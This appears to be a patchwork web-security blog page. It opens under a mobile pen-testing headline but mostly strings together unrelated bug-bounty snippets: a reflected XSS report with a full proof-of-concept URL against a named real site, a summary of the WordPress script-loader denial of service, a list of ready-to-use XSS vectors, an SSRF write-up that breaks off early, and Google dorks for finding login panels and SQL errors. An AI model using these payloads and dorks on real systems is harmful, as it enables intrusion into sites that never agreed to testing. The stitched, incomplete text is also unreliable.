How to hack an app: 8 best practices for pen testing mobile apps

Mobile applications are here to stay. They’ve become an essential part of our lives as
our dependence on our smartphones has grown. But when it comes to security,
users are like sitting ducks. Surveys in a recent study on the state of application security says
that “84 percent of mobile app users … believe that their mobile health
and finance apps are adequately secure.”

Truth is, security can be a false perception if we do not know how our applications were
developed and penetration tested. The reality is that downloading and using
these applications can represent a potential risk to both you and your
organization, given that untested apps may contain security bugs that can make
your data vulnerable. Unfortunately, the majority of mobile and health
applications contain serious security vulnerabilities. 

Reflected xss in 360totalsecurity

i have found vulnerability in 360totalsecurity ,is Reflected XSS in https://blog.360totalsecurity.com

Steps to reproduce :

Go to https://blog.360totalsecurity.com

and To : https://blog.360totalsecurity.com/en/safe-tips-for-wannacry-ransomware-attack/?utm_campaign=WannaCry_tips&utm_content=360.NSA.defense.tool&utm_medium=text_link&utm_source=Blog

and replace utm_source value by this XSS payload : x”><svG onLoad=prompt(document.domain)>

Line: <a href=”https://blog.360totalsecurity.com/en?utm_source=x“><svG onLoad=prompt(document.domain)>

Poc:

https://blog.360totalsecurity.com/en/safe-tips-for-wannacry-ransomware-attack/?utm_campaign=WannaCry_tips&utm_content=360.NSA.defense.tool&utm_medium=text_link&utm_source=x“><svG onLoad=prompt(document.domain)>

Regards,

TAHA

Denial of Service vulnerability in script-loader.php (CVE-2018-6389)

The load-scripts.php file receives a parameter called load[], the parameter value is ‘jquery-ui-core’. In the response, I received the JS module ‘jQuery UI Core’ that was requested

  What can be concluded from this URL, is that it is probably meant to supply users with some JS modules. In addition, the load[] parameter is an array, which means that it is possible to provide multiple values and be able to get multiple JS modules within the response.

   I wondered what would happen if I sent the server a request to supply me every JS module that it stored? A single request would cause the server to perform 181 I/O actions and provide the file contents in the response.

So I tried it, I sent the request to the server:

The server responded after 2.2 seconds, with almost 4MB of data, which made the server work really hard to process such a request.

Best XSS Vectors

Here’s a small #XSS list for manual testing (main cases, high success rate).

 "><img src onerror=alert(1)> 
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)

Try it on: – URL query, fragment & path; – all input fields.

From BruteLogic Twitter account : https://twitter.com/brutelogic

SSRF | Reading Local Files from DownNotifier server

Hello guys, this is my first write-up and I would like to share it with the bug bounty community, it’s a SSRF I found some months ago.

DownNotifier is an online tool to monitor a website
downtime. This tool sends an alert to registered email and sms when the website
is down.

DownNotifier has a BBP on Openbugbounty, so I decided to take a look on https://www.downnotifier.com. When I browsed to the website, I noticed a text field for URL and SSRF vulnerability quickly came to mind.

Collection of information | Google Hacking and Dorks basic

Find the login panel
site: objective.com inurl: admin | administrator | adm | login | l0gin | wp-login

SQL INJECTION
site: target.com intext: “sql syntax near” or “syntax error has occurred” or “incorrect syntax near” or “unexpected end of SQL command” or “Warning: mysql_connect ()” or “Warning: mysql_query ()” or “Warning: pg_connect ()” or “Warning: mysql_fetch_array ()”

site: target.com intext: “sql syntax near” or
“syntax error has occurred”
“incorrect syntax near”
“unexpected end of SQL command”
“Warning: mysql_connect ()”
“Warning: mysql_query ()”
“Warning: pg_connect ()”
“Warning: mysql_fetch_array ()”
“MySQL Query Failed”